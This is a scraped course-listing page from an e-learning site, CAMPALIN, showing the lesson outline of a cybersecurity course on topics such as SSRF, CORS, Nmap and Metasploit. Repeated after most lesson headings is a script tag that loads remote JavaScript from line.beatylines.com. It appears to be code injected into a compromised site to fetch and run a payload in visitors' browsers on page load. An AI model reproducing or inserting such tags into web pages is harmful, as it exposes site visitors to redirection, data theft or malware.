Skip to content
CAMPALIN
Courses
Computer Science / Information Technology
Machine Learning
Web Development
App Development
Artificial Intelligence
Cyber Security
Data Science
Cloud Computing
Electronics & Communication
Hybrid Electric Vehicles
Embedded Systems
Internet of Things
Robotics
Mechanical / Civil
Construction Planning
Car Design
AutoCad
Management
Human Resources
Digital Marketing
Finance
X
Search
Search
CAMPALIN
Cybersecurity (December)
Categories:
Computer Science / Information Technology
Wishlist
Share
Share Course
Page Link
Share On Social Media
Facebook
Twitter
Linkedin
About Course
Course Content
Introduction to Cyber Security
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
Introduction to Cyber Security
22:54
Basic Cyber Ethics
55:45
Advanced Ethical Hacking
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
Advanced Ethical Hacking
57:06
Techniques and procedures
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
Techniques and Procedures
47:17
Host Header Attack
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
Class 5
40:42
Server Side Request Forgery
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
class 6
59:07
Advanced Authentication Variability
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
Class 7
39:36
Cross-Origin Resource Sharing
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
class 8
35:30
Business logic vulnerabilities
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
class 9
40:25
CORS Vulnerability
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
Class 10
35:58
Linux Basic Commands
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
Class 11
36:00
Linux Basic Commands Continuation
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
Class 12
37:38
Reconnaissance in Cyber Security
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
Class 13
38:16
Nmap
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
Class 14
38:32
Metasploit
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
Class 15
42:45
Vyatta Network
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
class 16
42:35
Targets
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
class 17
57:47
Reporting
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
class 18
56:18
Cyber Threat Hunting
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
class 19
37:45
Doubts Clearing
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
class 20
39:59
Dashboard
My Profile
Settings
Logout